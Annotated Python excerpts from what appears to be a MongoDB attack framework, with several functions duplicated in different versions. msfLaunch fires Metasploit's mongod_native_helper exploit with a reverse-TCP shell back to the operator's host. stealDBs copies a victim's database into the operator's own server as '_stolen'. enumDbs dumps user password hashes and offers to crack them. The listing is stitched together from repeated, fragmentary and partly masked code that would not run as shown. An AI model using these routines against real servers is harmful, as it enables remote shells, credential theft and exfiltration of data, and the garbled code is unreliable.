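def setParam(self ,param ,value):
    '''Store a plugin option as a module-level global.

    The option name is upper-cased and *value* is bound, unmodified, to the
    global of that name. Returns None.

    The binding goes through ``globals()`` rather than ``exec`` on a
    formatted string. With the string-built form, a double quote inside
    *value* ended the generated literal early and the remainder was parsed
    as Python source; backslash sequences in *value* were also
    re-interpreted.
    '''
    param = param.upper()
    pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
    # NOTE(review): any upper-cased name is accepted here, so an existing
    # module global with that name is overwritten. Callers presumably vet
    # the name first (e.g. through checkParam) - confirm.
    globals()[param] = value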
def exploit(self):
    '''Rebind the global exploitModule to the result of calling it, then run the plugin.'''
    global exploitModule
    try:
        # Any failure of this call is swallowed by the bare except below.
        exploitModule = exploitModule()
    except:
        pass
    banner = "[*] Start exploit.."
    pp.prettyPrint(banner ,YELLOW)
    plugin.exploit()
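def do_set(self,arg):
    '''Handle ``set <PARAM> <VALUE>``.

    *arg* is split on runs of whitespace. Exactly two tokens are required;
    anything else prints the usage line. The parameter name is checked with
    pluginModule.checkParam() before pluginModule.setParam() is called, and
    a rejected name prints an error instead. Returns None.

    Splitting on any whitespace (rather than on single spaces) means that
    repeated spaces or tabs between the two tokens no longer produce empty
    tokens, and every malformed input now gets the usage line.
    '''
    tokens = arg.split()
    if len(tokens) != 2:
        pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
        return
    param, value = tokens
    # The name check runs before the value is stored.
    if self.pluginModule.checkParam(param):
        self.pluginModule.setParam(param ,value)
    else:
        pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW)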
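def msfLaunch(self, RHOST, LHOST, LPORT):
    """Run the msfcli command line built from RHOST, LHOST and LPORT.

    The command is handed to subprocess as an argument list with no shell
    in between. Characters in the three option values that a shell would
    interpret therefore stay inside their own argument and cannot alter
    the command line, which the previous ``shell=True`` string allowed.

    Without a shell, a missing msfcli executable now raises OSError, so the
    error message below is reached in that case. Returns None.
    """
    try:
        argv = [
            "msfcli",
            "exploit/linux/misc/mongod_native_helper",
            "RHOST=" + str(RHOST),
            "DB=local",
            "PAYLOAD=linux/x86/shell/reverse_tcp",
            "LHOST=" + str(LHOST),
            "LPORT=" + str(LPORT),
            "E",
        ]
        subprocess.call(argv)
    except Exception:
        # Exception (not a bare except) so Ctrl-C is not reported as a
        # missing installation.
        pp.prettyPrint(
            "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.",
            RED)
    return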
def enumGrid (self,mongoConn):
    '''Print the GridFS file names of every database on *mongoConn*.

    A failure on one database prints "GridFS not enabled on <name>."; a
    failure outside the per-database step prints the credentials message.
    '''
    # NOTE(review): both handlers are bare `except:`, so every kind of
    # error (including an interrupt) is reported with these two messages.
    try:
        for name in mongoConn.database_names():
            try:
                store = gridfs.GridFS(mongoConn[name])
                stored = store.list()
                pp.prettyPrint("GridFS enabled on database " + str(name),GREEN)
                pp.prettyPrint(" list of files:",GREEN)
                pp.prettyPrint("\n".join(stored),PURPLE)
            except:
                pp.prettyPrint("GridFS not enabled on " + str(name) + ".",RED)
    except:
        pp.prettyPrint("[!]Error: Couldn't enumerate GridFS. The provided credentials may not have rights.",RED)
    return
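def getPlatInfo(self, mongoConn):
    """Print the version, debug flag and word size reported by the server.

    ``server_info()`` is called once and its result reused, so the three
    printed values come from the same reply instead of three separate
    calls. Returns None.
    """
    pp.prettyPrint("Mongodb Server Basic Info", GREEN)
    # Fetched after the heading so a failing call still leaves the heading
    # printed, as before.
    details = mongoConn.server_info()
    pp.prettyPrint("MongoDB Version: " + details['version'], PURPLE)
    pp.prettyPrint("Debugs enabled : " + str(details['debug']), PURPLE)
    pp.prettyPrint("Platform: " + str(details['bits']) + " bit", PURPLE)
    return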
def enumGrid(self, mongoConn):
    """Print the GridFS file names of every database on *mongoConn*.

    A failure on one database prints "GridFS not enabled on <name>."; a
    failure outside the per-database step prints the credentials message.
    """
    # NOTE(review): both handlers are bare `except:`, so every kind of
    # error (including an interrupt) is reported with these two messages.
    try:
        for name in mongoConn.database_names():
            try:
                bucket = gridfs.GridFS(mongoConn[name])
                names = bucket.list()
                pp.prettyPrint("GridFS enabled on database " + str(name), GREEN)
                pp.prettyPrint(" list of files:", GREEN)
                pp.prettyPrint("\n".join(names), PURPLE)
            except:
                pp.prettyPrint("GridFS not enabled on " + str(name) + ".", RED)
    except:
        pp.prettyPrint(
            "[!]Error: Couldn't enumerate GridFS. The provided credentials may not have rights.",
            RED)
    return
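def setParam(self ,param ,value):
    '''Store a plugin option as a module-level global, with PAYLOAD handled separately.

    The option name is upper-cased first.

    * PAYLOAD with a value equal to "false" in any letter case sets the
      global PAYLOAD to the string "false".
    * PAYLOAD with any other value is stored only when checkPayload(value)
      returns 'TRUE' and getOption("PAYLOAD") is not "FALSE"; otherwise an
      error line is printed and nothing is stored.
    * Every other option is bound, unmodified, to the global of that name.

    Bindings go through ``globals()`` rather than ``exec`` on a formatted
    string. With the string-built form, a double quote inside *value* ended
    the generated literal early and the remainder was parsed as Python
    source. Returns None.
    '''
    param = param.upper()
    if param != 'PAYLOAD':
        pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW)
        # NOTE(review): any upper-cased name is accepted, so an existing
        # module global of that name is overwritten - confirm callers vet it.
        globals()[param] = value
        return
    if value.upper() == "FALSE":
        globals()['PAYLOAD'] = "false"
        pp.prettyPrint("[*] Disabled PAYLOAD !" ,YELLOW)
    # NOTE(review): the disabled state is stored as "false" but compared
    # against "FALSE" here; whether getOption() normalises case is not
    # visible from this function - confirm.
    elif self.checkPayload(value) == 'TRUE' and self.getOption("PAYLOAD") != "FALSE":
        pp.prettyPrint("[*] SET PAYLOAD=>%s"%value ,YELLOW)
        globals()['PAYLOAD'] = value
    else:
        pp.prettyPrint("[!] SET PAYLOAD FALSE !" ,RED)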
def errmsg(self,msg):
    '''Print *msg* behind an "[!] Err:" prefix using the RED colour constant.'''
    line = "[!] Err:%s"%msg
    pp.prettyPrint(line,RED)
def mainExit(self):
    '''Print a farewell line and leave the program with status 0.'''
    farewell = "\nBye "
    pp.prettyPrint(farewell,RED)
    exit(0)
def printLogo(self):
    '''Print the banner text held in self.logo.'''
    banner = self.logo
    # The third argument (0) is passed through as the original did; its
    # meaning is defined by prettyPrint, which is not visible here.
    pp.prettyPrint(banner,GREY,0)
def exeCMD(self,cmd):
    '''Echo *cmd*, then hand it to system().

    The string reaches system() exactly as received: nothing is quoted or
    filtered in this function, so it should only ever carry text typed by
    the local operator.
    '''
    notice = '[*] EXEC:%s'%cmd
    pp.prettyPrint(notice,RED)
    system(cmd)
def stealDBs(self,LHOST,LPORT,RHOST,mongoConn):
    '''List the databases on *mongoConn*, prompt for one, and copy it.

    The copy is requested from a client connected to LHOST:LPORT; the
    source host is RHOST and the destination name is the source name with
    "_stolen" appended.

    NOTE(review): part of the credentials branch is masked in this listing
    (the ``******`` runs); that statement is kept as found and is not valid
    Python.
    NOTE(review): the retry calls pass ``myDB`` and two arguments, but this
    function takes LHOST, LPORT, RHOST and mongoConn and no ``myDB`` is
    defined here; two of them also call a bare ``stealDBs`` rather than
    ``self.stealDBs``. As written they would raise instead of retrying.
    '''
    victim = RHOST
    localDbIp = LHOST
    localDbPort = int(LPORT)
    dbList = mongoConn.database_names()
    menuItem = 1
    if len(dbList) == 0:
        pp.prettyPrint("Can't get a list of databases to steal. The provided credentials may not have rights.",YELLOW)
        return
    # Numbered menu, starting at 1; the selection is later used as index - 1.
    for dbName in dbList:
        pp.prettyPrint(str(menuItem) + "-" + dbName,GREEN)
        menuItem += 1
    try:
        dbLoot = raw_input("Select a database to steal:")
    except:
        pp.prettyPrint("[!]Invalid selection.",RED)
        stealDBs(myDB,mongoConn)
    try:
        #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
        dbNeedCreds = raw_input("Does this database require credentials (y/n)? ")
        if dbNeedCreds.lower() == "n":
            myDBConn = pymongo.MongoClient(localDbIp,localDbPort)
            myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
        elif dbNeedCreds.lower() == "y":
            # Masked in the listing: everything between the username prompt and "_stolen" is lost.
            dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",victim,dbUser,dbPass)
        else:
            pp.prettyPrint("[!]Invalid Selection. Press enter to continue.",RED)
            stealDBs(myDB,mongoConn)
        cloneAnother = raw_input("Database cloned. Copy another (y/n)? ")
        if cloneAnother.lower() == "y":
            self.stealDBs(myDB,mongoConn)
        else:
            return
    # Bare except: every error from the block above ends up here.
    except:
        # The exception text decides between "copied without indexes" and a generic failure.
        if str(sys.exc_info()).find('text search not enabled') != -1:
            pp.prettyPrint("Database copied, but text indexing was not enabled on the target. Indexes not moved.",GREEN)
            return
        else:
            pp.prettyPrint("[!]Something went wrong. Are you sure your MongoDB is running and options are set?",RED)
            return
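def mainHelp(self):
    '''Print the main help menu followed by the ``show`` sub-menu.

    The ``show`` table previously contained unresolved merge-conflict
    markers (``<<<<<<< HEAD``, ``=======``, ``>>>>>>> 6f81fb7bb1cc81ab5062065b198e4e0b4b97e162``)
    inside the string literal, so they were printed to the user. The
    markers are removed and the rows from both sides are kept.
    '''
    pp.prettyPrint('NSS HELP MENU',YELLOW)
    pp.prettyPrint('=============',GREY)
    pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW)
    pp.prettyPrint(' ------- -----------',GREY,0)
    pp.prettyPrint(''' help Displays the help menu exit Exit the NSS cls Clear the screen show List the plugins search Search plugins use Use the plugin''',CYAN)
    pp.prettyPrint('NSS HELP::SHOW',YELLOW)
    pp.prettyPrint('==============',GREY)
    pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW)
    pp.prettyPrint(' ------- -----------',GREY,0)
    # NOTE(review): the `multi` row came from the incoming side of the
    # conflict and repeats the mongodb description - confirm the wording
    # and that `show multi` exists.
    pp.prettyPrint(''' mongodb List the mongodb plugins multi List the mongodb plugins all List all the plugins''',CYAN)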
def showOptions(self):
    '''Print the option table: a heading, then one row per entry of plugin.opts.

    Each entry is read by position: name, value, description.
    '''
    header_fmt = " %-15s %-20s %-40s"
    pp.prettyPrint("\n",GREY)
    pp.prettyPrint(" PLUGIN OPTS" ,YELLOW)
    pp.prettyPrint(" ===========" ,GREY)
    pp.prettyPrint(header_fmt%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
    pp.prettyPrint(header_fmt%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
    for entry in plugin.opts:
        name, current, about = entry[0], entry[1], entry[2]
        pp.prettyPrint(" %-15s"%name ,CYAN ,0)
        pp.prettyPrint("%-20s"%current, PURPLE, 0)
        pp.prettyPrint("%-20s"%about , GREEN)
    pp.prettyPrint("\n",GREY)
def showUsage(tips):
    '''Print *tips* behind a "[?] USAGE:" prefix.'''
    hint = '[?] USAGE:%s'%tips
    pp.prettyPrint(hint,YELLOW)
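def showOptions(self):
    '''Print the plugin option table and, when a payload is selected, its options.

    For each entry of plugin.opts the current value is read from the module
    global named after the option. When checkPayload(PAYLOAD) returns
    "TRUE", the payload file is loaded and the entries of NSSPayload.opts
    are listed.

    Changes from the previous version:
    * the value column is read with ``globals()[name]`` instead of building
      a print statement as a string and passing it to ``exec``;
    * the payload file is read inside ``with`` so the handle is closed;
    * the payload source runs with an explicit namespace instead of
      writing into this function's locals, and the no-op
      ``exec("global NSSPayload")`` is dropped.
    An option with no matching global now raises KeyError rather than
    NameError.
    '''
    pp.prettyPrint("PLUGIN OPTS" ,YELLOW)
    pp.prettyPrint("===========" ,GREY)
    pp.prettyPrint("%-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW)
    pp.prettyPrint("%-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY)
    for opt in plugin.opts:
        param = opt[0]
        desc = opt[2]
        pp.prettyPrint("%-15s"%param ,CYAN ,0)
        pp.prettyPrint("%-20s"%globals()[param], PURPLE, 0)
        pp.prettyPrint("%-40s"%desc ,GREEN)
    if self.checkPayload(PAYLOAD) == "TRUE":
        pp.prettyPrint("PAYLOAD OPTS" ,YELLOW)
        pp.prettyPrint("============" ,GREY)
        pp.prettyPrint("%-15s %-40s"%("PARAMETER" ,"DESCRIPTION") ,YELLOW)
        pp.prettyPrint("%-15s %-40s"%("-"*15 ,"-"*40) ,GREY)
        # NOTE(review): this runs the selected payload file as Python inside
        # this process, and PAYLOAD is concatenated into the path. The only
        # gate visible here is checkPayload(); confirm it rejects names that
        # contain path separators or "..", and that the plugins directory is
        # not writable by other users.
        with open("plugins/payload/" + PAYLOAD + ".py") as handle:
            code = handle.read()
        scope = {}
        exec(code, globals(), scope)
        # A payload file that declares NSSPayload global ends up in globals().
        if 'NSSPayload' in scope:
            payload_cls = scope['NSSPayload']
        else:
            payload_cls = globals()['NSSPayload']
        for opt in payload_cls.opts:
            param = opt[0]
            desc = opt[1]
            pp.prettyPrint("%-15s"%param ,CYAN ,0)
            pp.prettyPrint("%-40s"%desc ,PURPLE)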
def enumDbs(self, mongoConn):
    """Print database names, then each database's collection names.

    Where a database has a ``system.users`` collection, its documents are
    read and, per user, a prompt offers to pass the ``user`` and ``pwd``
    fields to self.passCrack().

    NOTE(review): one print statement in the user loop is masked in this
    listing (the ``******`` run); it is kept as found and is not valid
    Python.
    NOTE(review): stored password hashes are written to the console here;
    treat any captured output as sensitive.
    """
    try:
        pp.prettyPrint("List of databases:", GREEN)
        pp.prettyPrint("\n".join(mongoConn.database_names()), PURPLE)
    # Bare except: any error is reported as a rights problem.
    except:
        pp.prettyPrint(
            "[!]Error: Couldn't list databases. The provided credentials may not have rights.",
            RED)
    pp.prettyPrint("List of collections:", GREEN)
    try:
        for dbItem in mongoConn.database_names():
            db = mongoConn[dbItem]
            pp.prettyPrint(dbItem + ":", CYAN)
            pp.prettyPrint("\n".join(db.collection_names()), PURPLE)
            if 'system.users' in db.collection_names():
                users = list(db.system.users.find())
                pp.prettyPrint("Database Users and Password Hashes:", GREEN)
                for x in range(0, len(users)):
                    # Masked in the listing: the text between the two string literals is lost.
                    pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'], GREEN)
                    pp.prettyPrint("\n", GREEN)
                    crack = raw_input("Crack this hash (y/n)? ")
                    if crack.lower() == "y":
                        self.passCrack(users[x]['user'], users[x]['pwd'])
    # Bare except: any error in the loop above, including one raised by
    # passCrack, is reported as a rights problem.
    except:
        pp.prettyPrint(
            "[!]Error: Couldn't list collections. The provided credentials may not have rights.",
            RED)
    return
def info(self):
    '''Print the plugin info table: a heading, then one row per entry of plugin.infos.'''
    rule = "-"*15 + " " + "-"*20
    pp.prettyPrint("PLUGIN INFOS" ,YELLOW)
    pp.prettyPrint("============" ,GREY)
    pp.prettyPrint("PARAMETER VALUE" ,YELLOW)
    pp.prettyPrint(rule ,GREY)
    for entry in plugin.infos:
        # Entries are read by position: name first, value second.
        label, content = entry[0], entry[1]
        pp.prettyPrint("%-15s"%label ,CYAN ,0)
        pp.prettyPrint("%-s"%content ,PURPLE)
def pluginHelp(self):
    '''Print the plugin help menu followed by the ``set`` sub-menu.'''
    # One tuple per prettyPrint call, in output order; a third element is
    # passed through as prettyPrint's third argument.
    rows = (
        ('PLUGIN HELP MENU' ,YELLOW),
        ('================' ,GREY),
        (' Command Description' ,YELLOW),
        (' ------- -----------' ,GREY ,0),
        (''' help Displays the plugin menu exit Back to NSS Main cls Clear the screen info Displays the plugin info show Displays the plugin options set Configure the plugin parameters exploit Start plugin to exploit''' ,CYAN),
        ('PLUGIN SET HELP' ,YELLOW),
        ('===============' ,GREY),
        (' Command Description' ,YELLOW),
        (' ------- -----------' ,GREY,0),
        (''' PAYLOAD Set payload <PARAMETER> Set parameter''' ,CYAN),
    )
    for call_args in rows:
        pp.prettyPrint(*call_args)
def loadError(self,flag):
    '''Print one of two load-failure messages, chosen by the truth value of *flag*.'''
    message = "[!] NO THIS PLUGIN !" if flag else "[!] IT'S A PAYLOAD !"
    pp.prettyPrint(message,RED)
def start(self):
    '''Print the start-up line.'''
    notice = "[*] Start NSS .."
    pp.prettyPrint(notice,GREEN)
def stealDBs(self, LHOST, LPORT, RHOST, mongoConn):
    """List the databases on *mongoConn*, prompt for one, and copy it.

    The copy is requested from a client connected to LHOST:LPORT; the
    source host is RHOST and the destination name is the source name with
    "_stolen" appended.

    NOTE(review): part of the credentials branch is masked in this listing
    (the ``******`` runs); that statement is kept as found and is not valid
    Python.
    NOTE(review): the retry calls pass ``myDB`` and two arguments, but this
    function takes LHOST, LPORT, RHOST and mongoConn and no ``myDB`` is
    defined here; two of them also call a bare ``stealDBs`` rather than
    ``self.stealDBs``. As written they would raise instead of retrying.
    """
    victim = RHOST
    localDbIp = LHOST
    localDbPort = int(LPORT)
    dbList = mongoConn.database_names()
    menuItem = 1
    if len(dbList) == 0:
        pp.prettyPrint(
            "Can't get a list of databases to steal. The provided credentials may not have rights.",
            YELLOW)
        return
    # Numbered menu, starting at 1; the selection is later used as index - 1.
    for dbName in dbList:
        pp.prettyPrint(str(menuItem) + "-" + dbName, GREEN)
        menuItem += 1
    try:
        dbLoot = raw_input("Select a database to steal:")
    except:
        pp.prettyPrint("[!]Invalid selection.", RED)
        stealDBs(myDB, mongoConn)
    try:
        #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
        dbNeedCreds = raw_input(
            "Does this database require credentials (y/n)? ")
        if dbNeedCreds.lower() == "n":
            myDBConn = pymongo.MongoClient(localDbIp, localDbPort)
            myDBConn.copy_database(dbList[int(dbLoot) - 1], dbList[int(dbLoot) - 1] + "_stolen", victim)
        elif dbNeedCreds.lower() == "y":
            # Masked in the listing: everything between the username prompt and "_stolen" is lost.
            dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen", victim, dbUser, dbPass)
        else:
            pp.prettyPrint(
                "[!]Invalid Selection. Press enter to continue.", RED)
            stealDBs(myDB, mongoConn)
        cloneAnother = raw_input("Database cloned. Copy another (y/n)? ")
        if cloneAnother.lower() == "y":
            self.stealDBs(myDB, mongoConn)
        else:
            return
    # Bare except: every error from the block above ends up here.
    except:
        # The exception text decides between "copied without indexes" and a generic failure.
        if str(sys.exc_info()).find('text search not enabled') != -1:
            pp.prettyPrint(
                "Database copied, but text indexing was not enabled on the target. Indexes not moved.",
                GREEN)
            return
        else:
            pp.prettyPrint(
                "[!]Something went wrong. Are you sure your MongoDB is running and options are set?",
                RED)
            return
def mainHelp(self):
    '''Print the main help menu, framed by a blank line before and after.'''
    # One tuple per prettyPrint call, in output order; a third element is
    # passed through as prettyPrint's third argument.
    rows = (
        ("\n",GREY),
        (' NSS HELP MENU',YELLOW),
        (' =============',GREY),
        (' COMMAND DESCRIPTION',YELLOW),
        (' ------- -----------',GREY,0),
        (''' help Displays the help menu show List the plugins search Search plugins use Use the plugin banner Show the banner cls Clear the screen exit Exit the NSS''',CYAN),
        ("\n",GREY),
    )
    for call_args in rows:
        pp.prettyPrint(*call_args)
def enumDbs (self,mongoConn):
    '''Print database names, then each database's collection names.

    Where a database has a ``system.users`` collection, its documents are
    read and, per user, a prompt offers to pass the ``user`` and ``pwd``
    fields to self.passCrack().

    NOTE(review): one print statement in the user loop is masked in this
    listing (the ``******`` run); it is kept as found and is not valid
    Python.
    NOTE(review): stored password hashes are written to the console here;
    treat any captured output as sensitive.
    '''
    try:
        pp.prettyPrint("List of databases:",GREEN)
        pp.prettyPrint("\n".join(mongoConn.database_names()),PURPLE)
    # Bare except: any error is reported as a rights problem.
    except:
        pp.prettyPrint("[!]Error: Couldn't list databases. The provided credentials may not have rights.",RED)
    pp.prettyPrint("List of collections:",GREEN)
    try:
        for dbItem in mongoConn.database_names():
            db = mongoConn[dbItem]
            pp.prettyPrint(dbItem + ":",CYAN)
            pp.prettyPrint("\n".join(db.collection_names()),PURPLE)
            if 'system.users' in db.collection_names():
                users = list(db.system.users.find())
                pp.prettyPrint("Database Users and Password Hashes:",GREEN)
                for x in range (0,len(users)):
                    # Masked in the listing: the text between the two string literals is lost.
                    pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'],GREEN)
                    pp.prettyPrint("\n",GREEN)
                    crack = raw_input("Crack this hash (y/n)? ")
                    if crack.lower() == "y":
                        self.passCrack(users[x]['user'],users[x]['pwd'])
    # Bare except: any error in the loop above, including one raised by
    # passCrack, is reported as a rights problem.
    except:
        pp.prettyPrint("[!]Error: Couldn't list collections. The provided credentials may not have rights.",RED)
    return
def loadError(self):
    '''Print the "no such plugin" error line.'''
    message = "[!] NO THIS PLUGIN !"
    pp.prettyPrint(message,RED)
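def msfLaunch(self,RHOST,LHOST,LPORT):
    '''Run the msfcli command line built from RHOST, LHOST and LPORT.

    The command is handed to subprocess as an argument list with no shell
    in between. Characters in the three option values that a shell would
    interpret therefore stay inside their own argument and cannot alter
    the command line, which the previous ``shell=True`` string allowed.

    Without a shell, a missing msfcli executable now raises OSError, so the
    error message below is reached in that case. Returns None.
    '''
    try:
        options = [
            "RHOST=" + str(RHOST),
            "DB=local",
            "PAYLOAD=linux/x86/shell/reverse_tcp",
            "LHOST=" + str(LHOST),
            "LPORT=" + str(LPORT),
        ]
        subprocess.call(["msfcli", "exploit/linux/misc/mongod_native_helper"] + options + ["E"])
    except Exception:
        # Exception (not a bare except) so Ctrl-C is not reported as a
        # missing installation.
        pp.prettyPrint("Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.",RED)
    return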
def pluginHelp(self):
    '''Print the plugin help menu and the ``set`` sub-menu, framed by blank lines.'''
    # One tuple per prettyPrint call, in output order; a third element is
    # passed through as prettyPrint's third argument.
    rows = (
        ("\n",GREY),
        (' PLUGIN HELP MENU' ,YELLOW),
        (' ================' ,GREY),
        (' Command Description' ,YELLOW),
        (' ------- -----------' ,GREY ,0),
        (''' help Displays the plugin menu info Displays the plugin info show Displays the plugin options set Configure the plugin parameters exploit Exploit the target cls Clear the screen back Back to NSS Main''' ,CYAN),
        (' PLUGIN SET HELP' ,YELLOW),
        (' ===============' ,GREY),
        (' Command Description' ,YELLOW),
        (' ------- -----------' ,GREY,0),
        (''' <PARAMETER> Set parameter''' ,CYAN),
        ("\n",GREY),
    )
    for call_args in rows:
        pp.prettyPrint(*call_args)
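def getPlatInfo(self,mongoConn):
    '''Print the version, debug flag and word size reported by the server.

    ``server_info()`` is called once and its result reused, so the three
    printed values come from the same reply instead of three separate
    calls. Returns None.
    '''
    pp.prettyPrint("Mongodb Server Basic Info",GREEN)
    # Fetched after the heading so a failing call still leaves the heading
    # printed, as before.
    reply = mongoConn.server_info()
    pp.prettyPrint("MongoDB Version: " + reply['version'],PURPLE)
    pp.prettyPrint("Debugs enabled : " + str(reply['debug']),PURPLE)
    pp.prettyPrint("Platform: " + str(reply['bits']) + " bit",PURPLE)
    return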
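# Tail of a `set` command handler whose `def` line lies outside this excerpt; kept exactly as extracted.
if len(param) and len(value): res = self.pluginModule.checkParam(param) if res: self.pluginModule.setParam(param ,value) else: pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW) else: pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
def complete_set(self,text,line,begidx,endidx):
    '''Tab completion for ``set``.

    Returns a copy of every option name from pluginModule.getOptions() when
    *text* is empty, otherwise the names that start with *text* upper-cased.
    '''
    USE_ARG = self.pluginModule.getOptions()
    if not text:
        return USE_ARG[:]
    wanted = text.upper()
    return [i for i in USE_ARG if i.startswith(wanted)]
def do_EOF(self, arg=None):
    '''Return True so the command loop stops at end of input.

    *arg* is accepted and ignored. The previous signature took no argument
    besides self; if this class is a cmd.Cmd shell (it uses cmdloop and
    do_*/complete_* names), the dispatcher passes the rest of the line to
    every do_* handler, so that signature raised TypeError at end of input.
    '''
    return True
# `back` is an alias for the exit handler defined elsewhere in the file.
do_back = do_exit
if __name__ == '__main__':
    try:
        # NOTE(review): `arg` is not defined in the visible part of this
        # script - confirm where it is set.
        loads = loadPlugin(arg)
        loads.cmdloop()
    except KeyboardInterrupt:
        pp.prettyPrint("\n[!] CTRL+C EXIT !",RED)
    # `as` form: valid on Python 2.6+ and required on Python 3.
    except Exception as e:
        pp.prettyPrint("[!] ERR:%s"%e,RED)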
def info(self):
    '''Print the plugin info table, framed by a blank line before and after.'''
    rule = " "+"-"*15 + " " + "-"*20
    pp.prettyPrint("\n",GREY)
    pp.prettyPrint(" PLUGIN INFOS" ,YELLOW)
    pp.prettyPrint(" ============" ,GREY)
    pp.prettyPrint(" PARAMETER VALUE" ,YELLOW)
    pp.prettyPrint(rule ,GREY)
    for entry in plugin.infos:
        # Entries are read by position: name first, value second.
        label, content = entry[0], entry[1]
        pp.prettyPrint(" %-15s"%label ,CYAN ,0)
        pp.prettyPrint("%-s"%content ,PURPLE)
    pp.prettyPrint("\n",GREY)